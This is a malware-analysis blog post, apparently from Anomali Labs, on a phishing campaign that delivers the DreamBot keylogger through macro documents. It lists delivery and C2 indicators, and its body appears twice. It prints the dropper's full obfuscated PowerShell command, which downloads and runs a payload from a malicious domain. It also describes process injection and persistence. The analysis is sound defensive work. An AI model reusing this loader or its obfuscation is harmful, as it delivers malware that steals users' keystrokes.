Blog

DreamBot Campaign Dreams Big

Beginning in April, Anomali Labs observed a phishing campaign distributing malicious documents containing macros to download DreamBot, a variant of Ursnif.

Luis Mendieta
May 31, 2018
Table of contents
<h3>Summary</h3><p>Beginning late April, Anomali Labs observed a phishing campaign distributing malicious documents containing macros to download DreamBot, a variant of Ursnif. The downloaded DreamBot payload turned out to be a stealthy keylogger, contrary to previously observed behavior from this malware family. The campaign, which lasted several weeks, continually rotated its distribution architecture by using a variety of domains and IPs. At the time of this writing the campaign is still active.</p><h3>Distribution Analysis</h3><p>Anomali Labs was able to track this campaign by analyzing and observing the document lure and payload syntax. For the purpose of this report, the EWS_Inquiry.doc dropper (MD5 b20263ba3773b91bdd947af429e289af) was analyzed. The document lure is a mock Office365 message enticing the user to “Enable Editing”, then “Enable Content” to view the document.</p><p><img alt="" src="https://cdn.filestackcontent.com/ctrJ6Ky1R6umjLJORLih"/></p><p><em>Figure 1 Malicious Document Lure</em></p><p>Malicious macros are a popular choice for attackers because they are relatively easy to create and require limited user interaction. The EWS_Inquiry.doc contains multiple heavily obfuscated macros with random names. Upon execution, the macro uses PowerShell to initiate an HTTP GET request to http://kkjkajsdjasdqwec.com/ARN/testv.php?l=ttner4.yarn.</p><pre> powershell " ('V'+'SDns'+'adasd ='+' &amp;(8n'+'7'+'n8n7'+'+8n7e'+'8n'+'7+8n'+'7w-o'+'bje'+'c8n7+8n7t8n7'+') ra'+'nd'+'om;VSDYYU '+'='+' .(8n7ne'+'8n7+8n'+'7w8n7+8n7-ob'+'ject8n7) Syste'+'m.N'+'et.W'+'eb'+'Clie'+'nt;'+'VSD'+'NS'+'B'+' '+'='+' '+'VSDns'+'a'+'dasd.'+'next(1'+'0000'+', 2821'+'33);VS'+'D'+'A'+'D'+'CX = 8n7 http://kkjk'+'ajsd'+'ja'+'s'+'dqwe'+'c.com/A'+'RN/tes'+'tv'+'.ph'+'p?l'+'=ttner'+'4.yarn8'+'n7.Split(8n'+'7@8n7'+');VSD'+'SDC = VSDe'+'nv:'+'p'+'u'+'blic + 8n7wZU8'+'n7 + VSDN'+'SB +'+' (8n7.ex'+'8n'+'7+8n7e8n7);f'+'or'+'ea'+'c'+'h'+'(V'+'SD'+'asf'+'c '+'in VS'+'DAD'+'CX){'+'tr'+'y{VSD'+'YYU.xPr'+'D'+'oKcVW'+'nl'+'KcVOa'+'dF'+'IKcVl'+'exPr(V'+'S'+'D'+'asfc.xPrToStrK'+'cViKc'+'VNg'+'xPr(), VS'+'DS'+'DC'+')'+';&amp;(8n'+'7Invo8n7+8n7k8'+'n7+8n7'+'e-Item8n7'+')'+'(VS'+'D'+'SDC'+');'+'b'+'r'+'eak;}c'+'a'+'tc'+'h{}'+'}').RePlacE(([CHAr]75+[CHAr]99+[CHAr]86),'`').RePlacE(([CHAr]56+[CHAr]110+[CHAr]55),[strInG][CHAr]39).RePlacE('wZU','').RePlacE(([CHAr]120+[CHAr]80+[CHAr]114),[strInG][CHAr]34).RePlacE(([CHAr]86+[CHAr]83+[CHAr]68),'$') |&amp; ((vARiaBLe '*mdr*').NAmE[3,11,2]-JoIN'')</pre><p><em>Figure 2 PowerShell Command to Download Payload</em></p><p>The resulting payload is downloaded to C:UsersPublic{number}.exe and executed.</p><h3>Technical Analysis</h3><p><strong>Host Indicators</strong></p><p>The DreamBot implant we observed has close similarities to the variants reported by Proofpoint analysts (See Footnote 1). Perhaps the most interesting characteristic of this variant is its flow of execution. First, the PowerShell script executes the downloaded payload, which spawns a child process. Next, the child process executes the legitimate Windows utility “control.exe”. The implant payload injects code into “control.exe” process space, and then creates a series of registry keys that are consistent with DreamBot. Figure 3 below show the created keys:<br/> <br/> <img alt="" src="https://cdn.filestackcontent.com/Xr4sX9vfQGiKRDlHL46i"/></p><p><em>Figure 3 Registry keys created by Control.exe</em></p><p>The registry keys seen in Figure 3 are located at the following paths:</p><pre> HKCUSOFTWAREAppDataLowSoftwareMicrosoft{Random id number} HKCUSOFTWAREAppDataLowSoftwareMicrosoftClient</pre><p>During the next step of the execution chain, control.exe injects code into the explorer.exe process space. When the injected code starts running on Explorer.exe, in installs a persistence mechanism in the HKCU...CurrentVersion un registry key. See registry key path below:</p><pre> HKCUSOFTWAREMicrosoftWindowsCurrentVersionRundprfest = [path of payload]</pre><p>The memory space of the explorer.exe process contained the presence of several domains related to the compromise. We also observed full URLs used for C2 communications, as can be seen in the figure below:</p><p><img alt="" src="https://cdn.filestackcontent.com/aADYGMMyTkyYGIlEu6vq"/></p><p><em>Figure 4 Explorer.exe memory strings</em></p><p><strong>Network Communications</strong></p><p>This variant of DreamBot communicates over HTTPS. Anomali Labs intercepted the SSL traffic to uncover the transmitted data. Analysis of the HTTPS request revealed the transfer of small Windows .cab files with the following naming convention: [A-Z0-9]{4}.bin. Figure 5 below shows the decrypted HTTPS request:</p><p><img alt="" src="https://cdn.filestackcontent.com/uq0mKAmKTkuSLT8iL6Jv"/></p><p><em>Figure 5 Decrypted HTTPS request</em></p><p>We analyzed the exfiltrated .cab files and discovered they were actually keylog files. Figure 5 below demonstrates the content of one of these files:</p><p><img alt="" src="https://cdn.filestackcontent.com/akzs2HaRbqR8jMtTaRpu"/></p><p><em>Figure 6 Keylog Data</em></p><h3>Conclusion</h3><p>Anomali Labs’ research of this DreamBot campaign identified significant developments in recent DreamBot deployment.</p><ul><li>The usage of process injection twice is unique and serves to complicate analysis because identifying the breakpoint in the newly injected processes outside of the current debugger is difficult and requires monitoring Windows API calls outside of standard process debugging.</li><li>The use of DreamBot as a keylogger differs from DreamBot’s previous usage as a banking trojan. This could indicate attackers are broadening the scope of targeting for this campaign beyond banking credentials.</li></ul><p>Anomali Labs will continue to track this campaign and provide our clients with updated IOCs and reporting.</p><h3>Indicators of Compromise</h3><p><strong>DreamBot Delivery</strong></p><pre> 14ca1s5asc45.com tttiweqwneasdqwe.com g98d4qwd4asd.com hhhasdnqwesdasd.com qqwqwwwpoasd.com asldkjasndqweasd.com iiasjdqwjenqasdnq.com eertasidasnqweas.com qqwqwwwpoasd.com sdjqiweqwnesd.com sdf5wer4wer.com tttiweqwneasdqwe.com oooiawneqweasd.com aninsnasdneqwe.com ppoadajsqwenqw.com yyjqnwejqnweqweq.com jjasdkeqnqweqwe.com oooiasndqjwenda.com kkjkajsdjasdqwec.com uuuansdownew.net</pre><p><strong>DreamBot Command and Control</strong></p><pre> 86.105.1.151 carforklou.at 51.254.172.105 </pre><p>1. https://www.proofpoint.com/us/threat-insight/post/ursnif-variant-dreambot-adds-tor-functionality</p>
Luis Mendieta

Luis Mendieta is a former Senior Security Researcher at Anomali.

Propel your mission with amplified visibility, analytics, and AI.

Learn how Anomali can help you cost-effectively improve your security posture.

May 31, 2018
-
Luis Mendieta
,

DreamBot Campaign Dreams Big

<h3>Summary</h3><p>Beginning late April, Anomali Labs observed a phishing campaign distributing malicious documents containing macros to download DreamBot, a variant of Ursnif. The downloaded DreamBot payload turned out to be a stealthy keylogger, contrary to previously observed behavior from this malware family. The campaign, which lasted several weeks, continually rotated its distribution architecture by using a variety of domains and IPs. At the time of this writing the campaign is still active.</p><h3>Distribution Analysis</h3><p>Anomali Labs was able to track this campaign by analyzing and observing the document lure and payload syntax. For the purpose of this report, the EWS_Inquiry.doc dropper (MD5 b20263ba3773b91bdd947af429e289af) was analyzed. The document lure is a mock Office365 message enticing the user to “Enable Editing”, then “Enable Content” to view the document.</p><p><img alt="" src="https://cdn.filestackcontent.com/ctrJ6Ky1R6umjLJORLih"/></p><p><em>Figure 1 Malicious Document Lure</em></p><p>Malicious macros are a popular choice for attackers because they are relatively easy to create and require limited user interaction. The EWS_Inquiry.doc contains multiple heavily obfuscated macros with random names. Upon execution, the macro uses PowerShell to initiate an HTTP GET request to http://kkjkajsdjasdqwec.com/ARN/testv.php?l=ttner4.yarn.</p><pre> powershell " ('V'+'SDns'+'adasd ='+' &amp;(8n'+'7'+'n8n7'+'+8n7e'+'8n'+'7+8n'+'7w-o'+'bje'+'c8n7+8n7t8n7'+') ra'+'nd'+'om;VSDYYU '+'='+' .(8n7ne'+'8n7+8n'+'7w8n7+8n7-ob'+'ject8n7) Syste'+'m.N'+'et.W'+'eb'+'Clie'+'nt;'+'VSD'+'NS'+'B'+' '+'='+' '+'VSDns'+'a'+'dasd.'+'next(1'+'0000'+', 2821'+'33);VS'+'D'+'A'+'D'+'CX = 8n7 http://kkjk'+'ajsd'+'ja'+'s'+'dqwe'+'c.com/A'+'RN/tes'+'tv'+'.ph'+'p?l'+'=ttner'+'4.yarn8'+'n7.Split(8n'+'7@8n7'+');VSD'+'SDC = VSDe'+'nv:'+'p'+'u'+'blic + 8n7wZU8'+'n7 + VSDN'+'SB +'+' (8n7.ex'+'8n'+'7+8n7e8n7);f'+'or'+'ea'+'c'+'h'+'(V'+'SD'+'asf'+'c '+'in VS'+'DAD'+'CX){'+'tr'+'y{VSD'+'YYU.xPr'+'D'+'oKcVW'+'nl'+'KcVOa'+'dF'+'IKcVl'+'exPr(V'+'S'+'D'+'asfc.xPrToStrK'+'cViKc'+'VNg'+'xPr(), VS'+'DS'+'DC'+')'+';&amp;(8n'+'7Invo8n7+8n7k8'+'n7+8n7'+'e-Item8n7'+')'+'(VS'+'D'+'SDC'+');'+'b'+'r'+'eak;}c'+'a'+'tc'+'h{}'+'}').RePlacE(([CHAr]75+[CHAr]99+[CHAr]86),'`').RePlacE(([CHAr]56+[CHAr]110+[CHAr]55),[strInG][CHAr]39).RePlacE('wZU','').RePlacE(([CHAr]120+[CHAr]80+[CHAr]114),[strInG][CHAr]34).RePlacE(([CHAr]86+[CHAr]83+[CHAr]68),'$') |&amp; ((vARiaBLe '*mdr*').NAmE[3,11,2]-JoIN'')</pre><p><em>Figure 2 PowerShell Command to Download Payload</em></p><p>The resulting payload is downloaded to C:UsersPublic{number}.exe and executed.</p><h3>Technical Analysis</h3><p><strong>Host Indicators</strong></p><p>The DreamBot implant we observed has close similarities to the variants reported by Proofpoint analysts (See Footnote 1). Perhaps the most interesting characteristic of this variant is its flow of execution. First, the PowerShell script executes the downloaded payload, which spawns a child process. Next, the child process executes the legitimate Windows utility “control.exe”. The implant payload injects code into “control.exe” process space, and then creates a series of registry keys that are consistent with DreamBot. Figure 3 below show the created keys:<br/> <br/> <img alt="" src="https://cdn.filestackcontent.com/Xr4sX9vfQGiKRDlHL46i"/></p><p><em>Figure 3 Registry keys created by Control.exe</em></p><p>The registry keys seen in Figure 3 are located at the following paths:</p><pre> HKCUSOFTWAREAppDataLowSoftwareMicrosoft{Random id number} HKCUSOFTWAREAppDataLowSoftwareMicrosoftClient</pre><p>During the next step of the execution chain, control.exe injects code into the explorer.exe process space. When the injected code starts running on Explorer.exe, in installs a persistence mechanism in the HKCU...CurrentVersion un registry key. See registry key path below:</p><pre> HKCUSOFTWAREMicrosoftWindowsCurrentVersionRundprfest = [path of payload]</pre><p>The memory space of the explorer.exe process contained the presence of several domains related to the compromise. We also observed full URLs used for C2 communications, as can be seen in the figure below:</p><p><img alt="" src="https://cdn.filestackcontent.com/aADYGMMyTkyYGIlEu6vq"/></p><p><em>Figure 4 Explorer.exe memory strings</em></p><p><strong>Network Communications</strong></p><p>This variant of DreamBot communicates over HTTPS. Anomali Labs intercepted the SSL traffic to uncover the transmitted data. Analysis of the HTTPS request revealed the transfer of small Windows .cab files with the following naming convention: [A-Z0-9]{4}.bin. Figure 5 below shows the decrypted HTTPS request:</p><p><img alt="" src="https://cdn.filestackcontent.com/uq0mKAmKTkuSLT8iL6Jv"/></p><p><em>Figure 5 Decrypted HTTPS request</em></p><p>We analyzed the exfiltrated .cab files and discovered they were actually keylog files. Figure 5 below demonstrates the content of one of these files:</p><p><img alt="" src="https://cdn.filestackcontent.com/akzs2HaRbqR8jMtTaRpu"/></p><p><em>Figure 6 Keylog Data</em></p><h3>Conclusion</h3><p>Anomali Labs’ research of this DreamBot campaign identified significant developments in recent DreamBot deployment.</p><ul><li>The usage of process injection twice is unique and serves to complicate analysis because identifying the breakpoint in the newly injected processes outside of the current debugger is difficult and requires monitoring Windows API calls outside of standard process debugging.</li><li>The use of DreamBot as a keylogger differs from DreamBot’s previous usage as a banking trojan. This could indicate attackers are broadening the scope of targeting for this campaign beyond banking credentials.</li></ul><p>Anomali Labs will continue to track this campaign and provide our clients with updated IOCs and reporting.</p><h3>Indicators of Compromise</h3><p><strong>DreamBot Delivery</strong></p><pre> 14ca1s5asc45.com tttiweqwneasdqwe.com g98d4qwd4asd.com hhhasdnqwesdasd.com qqwqwwwpoasd.com asldkjasndqweasd.com iiasjdqwjenqasdnq.com eertasidasnqweas.com qqwqwwwpoasd.com sdjqiweqwnesd.com sdf5wer4wer.com tttiweqwneasdqwe.com oooiawneqweasd.com aninsnasdneqwe.com ppoadajsqwenqw.com yyjqnwejqnweqweq.com jjasdkeqnqweqwe.com oooiasndqjwenda.com kkjkajsdjasdqwec.com uuuansdownew.net</pre><p><strong>DreamBot Command and Control</strong></p><pre> 86.105.1.151 carforklou.at 51.254.172.105 </pre><p>1. https://www.proofpoint.com/us/threat-insight/post/ursnif-variant-dreambot-adds-tor-functionality</p>

Get the Latest Anomali Updates and Cybersecurity News – Straight To Your Inbox

Become a subscriber to the Anomali Newsletter
Receive a monthly summary of our latest threat intelligence content, research, news, events, and more.